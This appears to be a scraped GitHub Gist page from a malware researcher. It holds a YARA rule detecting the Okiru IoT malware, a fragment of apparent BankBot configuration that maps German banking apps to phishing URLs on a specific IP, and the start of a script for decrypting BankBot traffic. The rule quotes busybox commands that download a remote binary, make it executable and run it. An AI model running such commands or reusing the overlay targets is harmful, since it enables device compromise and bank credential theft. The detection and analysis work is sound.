Fernando Urbano azurda

@azurda
azurda / Okiru.yar
Last active December 12, 2017 10:49
Ruleset to detect the Okiru IoT malware based on the ARMv7 version found.
rule Okiru : arm7 {
    meta:
        date = "11.12.2017"
        description = "Ruleset to detect the Okiru IoT malware based on the ARMv7 version found."
    strings:
        $busy_1 = "/bin/busybox cp /bin/busybox %s; /bin/busybox cp /bin/busybox %s; >%s; >%s; /bin/busybox chmod 777 %s %s"
        $busy_2 = "/bin/busybox cp /bin/busybox %s; >%s; /bin/busybox chmod 777 %s"
        $busy_3 = "/bin/busybox wget http://%d.%d.%d.%d:%d/fahwrzadws/okiru.%s -O -> %s; /bin/busybox chmod 777 %s; ./%s; >%s"
        $busy_4 = "/bin/busybox tftp -r okiru.%s -l %s -g %d.%d.%d.%d; /bin/busybox chmod 777 %s; ./%s; >%s"
        $busy_5 = "/bin/busybox echo -en '%s' %s %s && /bin/busybox echo -en '\x45\x43\x48\x4f\x44\x4f\x4e\x45'"
[{
"to": "com.db.mm.deutschebank",
"body": "http://188.209.49.198/777/l/05.php"
}, {
"to": "de.commerzbanking.mobil",
"body": " http://188.209.49.198/777/l/06.php"
}, {
"to": "com.ing.diba.mbbr2",
"body": " http://188.209.49.198/777/l/13.php"
}, {
@azurda
azurda / bankbot_drecryptor.py
Last active April 26, 2019 17:39
script to decrypt bankbot comms
import sys
import urllib
__author__ = 'fdiaz@hispasec.com'
""" Script to decrypt bankbot communications
argv[1] = key
argv[2] = encrypted string
Example:
decrypter.py "qwe" "5w wqq 98 5w 49 wqe 5e 5q 48 48 wqe 98 97 55 53 53 37 5w 65 49 37 5w 65 48"